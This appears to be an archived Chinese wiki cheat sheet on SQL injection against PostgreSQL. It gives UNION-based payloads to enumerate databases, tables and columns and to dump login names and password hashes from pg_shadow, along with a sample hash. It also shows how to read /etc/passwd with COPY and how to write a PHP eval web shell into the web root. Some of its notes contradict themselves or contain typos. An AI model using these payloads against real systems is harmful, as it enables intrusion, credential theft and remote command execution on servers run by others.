用户工具

站点工具


习科旧站:postgresql注入指南

Postgre SQL

显示版本

select version();
union select 1,2,...n,version()
//version()函数与MySQL的是一样的

回显数据举例:
PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)

从已知表段字段爆数据

select aa from bb where cc=dd;
union select 1,2,....n,aa from bb where cc=dd

所有的SQL语法几乎都是这样的语法来爆数据

列库

select datname from pg_database;
union select 1,2,....,n,datname from pg_database;

回显举例:postgres,prc,template1,template0

列数据库中的表段

select relname from pg_stat_user_tables limit 1 offset n;
//类似于MySQL中的information_schema.tables,虽然不大恰当
union select relname from pg_stat_user_tables limit 1 offset 3;
//limit 1 offset 0和MySQL的limit 0,1一个效果。

无举例

列表段中的字段

select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;
union select 1,2,.....,n,column_name from information_schema.columns where table_name=0x3a limit 1 offset 5

同MySQL

读取配置信息

读取数据库登陆账户和密码

select usename,passwd from pg_shadow;
union select 1,2,...n,usename,passwd from pg_shadow

pg_shadow数据库类似于MySQL中的mysql数据库,root账户为postgres
回显举例:postgres 9d2e7638fd7c7e433f0074a8f65cfd3a

读取文件

create table test(code text);
copy test from '/etc /passwd'with delimiter E'\t';

注:网上多数关于Postgresql的语句中是双引号,实际测试,8.x到9.x双引号无效,应该用双引号)
回显举例:
Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: “root:x:0:0:root:/root:/bin/bash”

写入文件

insert into test values ('<?php eval($_POST["cmd"];?>');
copy test(code) to ”/var/www/one.php”;

回显举例:Query failed: ERROR: could not open file “/var/www/html/aaa.php” for writing: Permission denied pg_file_read()不如MySQL中的load_file()那么好用

例如:

select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));

回显:
Query failed: ERROR: function pg_file_length(“unknown”) does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.


你需要登录发表评论。
习科旧站/postgresql注入指南.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具